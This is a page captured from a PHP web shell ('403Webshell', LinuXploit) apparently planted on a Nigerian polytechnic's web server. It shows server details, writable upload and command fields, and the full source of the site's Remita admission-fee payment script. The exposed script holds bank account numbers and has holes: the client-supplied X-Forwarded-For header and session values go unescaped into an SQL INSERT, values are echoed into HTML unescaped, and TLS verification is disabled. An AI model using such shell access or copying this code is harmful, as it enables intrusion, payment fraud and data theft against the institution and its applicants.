403Webshell
Server IP : 172.64.80.1  /  Your IP : 108.162.241.66
Web Server : Apache
System : Linux mail.federalpolyede.edu.ng 5.10.0-32-amd64 #1 SMP Debian 5.10.223-1 (2024-08-10) x86_64
User : federalpolyede.edu.ng_idh35skikv ( 10000)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/federalpolyede.edu.ng/httpdocs/ace_entranceForm/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhosts/federalpolyede.edu.ng/httpdocs/ace_entranceForm/postjson_form.php
<?php
session_start();
$formNo=$transID=$_SESSION['transID'];
$surname=$_SESSION['surname'];
$otherNames=$_SESSION['otherNames'];
$dept=$_SESSION['dept'];
$gsm=$_SESSION['gsm'];
$email=$_SESSION['email'];
 $formType=$_SESSION['formType'];
 $paymentType=$_SESSION['formType'];


?><!--
@company - SystemSpecs
@product - Remita
@author - Oshadami Mike

-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="../Templates/mainTemp.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
    <!-- Bootstrap Core CSS -->
    <link href="../bower_components/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet">

    <!-- MetisMenu CSS -->
    <link href="../bower_components/metisMenu/dist/metisMenu.min.css" rel="stylesheet">

    <!-- Custom CSS -->
    <link href="../dist/css/sb-admin-2.css" rel="stylesheet">

    <!-- Custom Fonts -->
    <link href="../bower_components/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
    <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
    <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>

    <![endif]-->
    <script src="../../chat/js/libs/jquery-1.7.2.min.js"></script>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <!-- InstanceBeginEditable name="doctitle" -->
    <title>Federal Poly Ede | Admission Form</title>
    <!-- InstanceEndEditable -->
    <!-- InstanceBeginEditable name="head" -->
    <script src="../SpryAssets/SpryTabbedPanels.js" type="text/javascript"></script>
    <link href="../SpryAssets/SpryTabbedPanels.css" rel="stylesheet" type="text/css" />

    <!-- InstanceEndEditable -->
    <style type="text/css">
        body {
            background-color: #CFD1DE;
            background-image: url(../images/logo2fade.png);
        }
    </style>

    <link rel="stylesheet" href="css/bootstrap.min.css">
    <link rel="stylesheet" href="css/bootstrap-dark.min.css">
</head>
<body background="../images/logo2fade.png">

<table width="90%" align="center" cellpadding="3" cellspacing="5" background="../images/ba.png">
    <tr>
        <td>
            jkh
        </td
        <br>
        <td>h</td>

    </tr>
    <tr></tr>
    <tr><td><br></td></tr>
    <tr><td><br></td></tr>
    <tr><td><br></td></tr>
    <tr><td><br></td></tr>
    <tr><td><br></td></tr>
    <tr><td><br></td></tr>
</table><br>

<div id="wrapper">


<div class="col-lg-8 col-lg-offset-2">
    <div class="form-group">
        <label class="col-sm-4 control-label">Payer Name</label>
        <div class="col-sm-8">
            <input type="text" class="form-control" value="<?php echo $surname.' '.$otherNames  ;?>"  name="name" >
        </div>
    </div>
    <div class="form-group">
        <label class="col-sm-4 control-label">Payer Email</label>
        <div class="col-sm-8">
            <input type="text" class="form-control" value="<?php echo $email;?>" name="email" >
        </div>
    </div>
    <div class="form-group">
        <label class="col-sm-4 control-label">Payer Phone</label>
        <div class="col-sm-8">
            <input type="text" class="form-control" value="<?php echo $gsm ;?>" name="phone" >
        </div>
    </div>
    <div class="form-group">
        <label class="col-sm-4 control-label">Form Fee</label>
        <div class="col-sm-8">
            <input type="text" class="form-control" value="<?php echo $_SESSION['f_amount'] ;?>" name="f_amount" disabled="disabled">
        </div>
    </div>
    <div class="form-group">
        <label class="col-sm-4 control-label">Charges</label>
        <div class="col-sm-8">
            <input type="text" class="form-control" value="<?php echo $_SESSION['f_charges'] ;?>" name="f_charges" disabled="disabled">
        </div>
    </div>
    <div class="form-group">
        <label class="col-sm-4 control-label">Total Amount</label>
        <div class="col-sm-8">
            <input type="text" class="form-control" value="<?php echo $_SESSION['amount'] ;?>" name="amount" disabled="disabled">
        </div>
    </div>
    <?php
    include 'remita_contants_split.php';

    if ( $paymentType=="utmeForm")
    {
        $servicetypeId = SERVICETYPEID_SCR;

    }else{
        $servicetypeId = SERVICETYPEID_APP;
    }
    $amount=$totalAmount = $_SESSION['amount'];

    $timesammp=DATE("dmyHis");
    $orderID=mt_rand(100, 999).$transID;
    $payerName = $_POST["payerName"];
    $payerEmail = $_POST["payerEmail"];
    $payerPhone = $_POST["payerPhone"];
    $responseurl = PATH . "/receipt-pageForm_New.php";
    $hash_string = MERCHANTID . $servicetypeId . $orderID . $totalAmount . $responseurl . APIKEY;
    $hash = hash('sha512', $hash_string);
    $itemtimestamp = $timesammp;

    $itemid1="itemid1";
    $itemid2="34444".$itemtimestamp;
    $itemid3="8694".$itemtimestamp;

    $beneficiaryName="Federal Polytechnic Ede";
    $beneficiaryName2="OMEGA PLUS SOLUTIONS LIMITED";
    $beneficiaryAccount="0280451361034";
    $beneficiaryAccount2="0119947297";
    $bankCode="000";
    $bankCode2="058";

//    $beneficiaryName="Oshadami Mke";
//    $beneficiaryName2="Mujib Ishola";
//    $beneficiaryAccount="6020067886";
//    $beneficiaryAccount2="0360883515";
//    $bankCode="011";
//    $bankCode2="050";

    $beneficiaryAmount =$_SESSION['f_amount'];
    $beneficiaryAmount2 =$_SESSION['f_charges'];
    //$beneficiaryAmount3 ="0";
    $deductFeeFrom=1;
    $deductFeeFrom2=0;
    //The JSON data.
     $content = '{"merchantId":"'. MERCHANTID
        .'"'.',"serviceTypeId":"'.$servicetypeId
        .'"'.",".'"totalAmount":"'.$totalAmount
        .'","hash":"'. $hash
        .'"'.',"orderId":"'.$orderID
        .'"'.",".'"responseurl":"'.$responseurl
        .'","payerName":"'. $payerName
        .'"'.',"payerEmail":"'.$payerEmail
        .'"'.",".'"payerPhone":"'.$payerPhone
        .'","lineItems":[
{"lineItemsId":"'.$itemid1.'","beneficiaryName":"'.$beneficiaryName.'","beneficiaryAccount":"'.$beneficiaryAccount.'","bankCode":"'.$bankCode.'","beneficiaryAmount":"'.$beneficiaryAmount.'","deductFeeFrom":"'.$deductFeeFrom.'"},
{"lineItemsId":"'.$itemid2.'","beneficiaryName":"'.$beneficiaryName2.'","beneficiaryAccount":"'.$beneficiaryAccount2.'","bankCode":"'.$bankCode2.'","beneficiaryAmount":"'.$beneficiaryAmount2.'","deductFeeFrom":"'.$deductFeeFrom2.'"}
]}';
    $curl = curl_init(GATEWAYURL);
    curl_setopt($curl, CURLOPT_HEADER, false);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($curl, CURLOPT_HTTPHEADER,
        array("Content-type: application/json"));
    curl_setopt($curl, CURLOPT_POST, true);
    curl_setopt($curl, CURLOPT_POSTFIELDS, $content);
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
    $json_response = curl_exec($curl);
    $status = curl_getinfo($curl, CURLINFO_HTTP_CODE);
    curl_close($curl);
    $jsonData = substr($json_response, 6, -1);
    $response = json_decode($jsonData, true);
    $statuscode = $response['statuscode'];
    $statusMsg = $response['status'];

    if($statuscode=='025'){
        $rrr = trim($response['RRR']);
        $new_hash_string = MERCHANTID . $rrr . APIKEY;
        $new_hash = hash('sha512', $new_hash_string);
        echo '<html>
<head>
<link rel="stylesheet" href="css/bootstrap.min.css">
<link rel="stylesheet" href="css/bootstrap-dark.min.css">
</head>
<style type="text/css">
        body {
            background-color: #CFD1DE;
            background-image: url(../images/logo2fade.png);
        }
    </style>
<body>


<form action="'.GATEWAYRRRPAYMENTURL.'" method="POST">
<input id="merchantId" name="merchantId" value="'.MERCHANTID.'" type="hidden"/>
<input id="rrr" name="rrr" value="'.$rrr.'" type="hidden"/>
<input id="responseurl" name="responseurl" value="'.$responseurl.'" type="hidden"/>
<input id="hash" name="hash" value="'.$new_hash.'" type="hidden"/>
<div class="form-group">
	<label class="col-sm-4 control-label">Payment Type</label>
	<div class="col-sm-8">

		<select name="paymenttype" class="form-control">
			<option value=""> -- Select --</option>
			<option value="REMITA_PAY"> Remita Account Transfer</option>
			<option value="Interswitch"> Verve Card</option>
			<option value="UPL"> Visa</option>
			<option value="UPL"> MasterCard</option>
			<option value="PocketMoni"> PocketMoni</option>
			<option value="RRRGEN"> POS</option>
			<option value="ATM"> ATM</option>
			<option value="BANK_BRANCH">BANK BRANCH</option>
			<option value="BANK_INTERNET">BANK INTERNET</option>
		</select>
	</div>
</div>

 <div class="form-group">
	<div class="col-sm-8 col-sm-offset-4">
		<input type="submit" class="btn btn-sm btn-primary" name="submit" value="Submit" />
	</div>
</div>
	</form>


</div>

</body>
</html>';

        require('../connect.php');
        $db=db_connect();
        require('../filetoU/logFile.php');
        $logD='OrderID: '.$orderID.' PaymentType: '.$paymentType;
        logDetail($formNo,$logD);
        $ip2=$_SERVER['HTTP_X_FORWARDED_FOR'];
        $ip1=$_SERVER['REMOTE_ADDR'];

      //  $sql_query="INSERT INTO entrancetable (`sn`, `surname`, `othernames`, `password`, `gsm`, `email`, `course`, `transID`,`formType`,`dept`,`formNo`) VALUES (?,?,?,?,?,?,?,?,?,?,?)";
     //   $sql_a = $db->prepare($sql_query);
      //  $sql_a->execute([NULL,$surName,$otherNames,$pass2,$phoneNumber,$eMail,$dept,$transID,$formTypea,$dept,'']);

       // $sql_query="INSERT INTO `fedpoly`.`remitaorderform`(`sn`, `orderID`, `remitaRRR`, `transDate`, `transStatus`, `regNo`, `transDetail`, `amtPaid`, `paymentType`, `transApproved`,`clientIP`,`clientProxy`)
//VALUES (?,?,?,?,?,?,?,?,?,?)";
       // $sql_a = $db->prepare($sql_query);
      //  $sql_a->execute([NULL,$orderID,0,CURRENT_TIME,-1,$formNo,'Not Yet Approved',$amount,$paymentType,'False',$ip1,$ip2]);

        $amount_t=$amount-500;
        $db->query("INSERT INTO `fedpoly`.`remitaorderform`
(`sn`, `orderID`, `remitaRRR`, `transDate`, `transStatus`, `regNo`, `transDetail`, `amtPaid`, `paymentType`, `transApproved`,`clientIP`,`clientProxy`)
VALUES (NULL, '$orderID', '0', CURRENT_TIME, '-1', '$formNo', 'Not Yet Approved', '$amount_t', '$paymentType', 'False','$ip1','$ip2')");


        //$db->query("INSERT INTO `remitaorderform` (`sn`, `orderID`, `remitaRRR`, `transDate`, `dateCreated`, `transStatus`, `regNo`, `transDetail`, `amtPaid`, `paymentType`, `transApproved`, `bankCode`, `channnel`, `branchCode`, `datesent`, `daterequested`, `clientIP`, `clientProxy`, `descr`) VALUES (NULL, '1', '2', CURRENT_DATE(), CURRENT_TIME(), '5', '6', '7', '8', '9', '9', '0', '0', '0', CURRENT_DATE(), CURRENT_DATE(), '0', '0', '0')");
//mysql_query("UPDATE `fedpoly`.`admitted` SET `email` = '$payerEmail',`gsm` = '$payerPhone' WHERE `admitted`.`formNo` = '$formNo'")");


    }
    else{
        echo "Error Generating RRR - " .$statusMsg;
        echo $statuscode;
       // echo $statusMsg;
    }

    ?>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit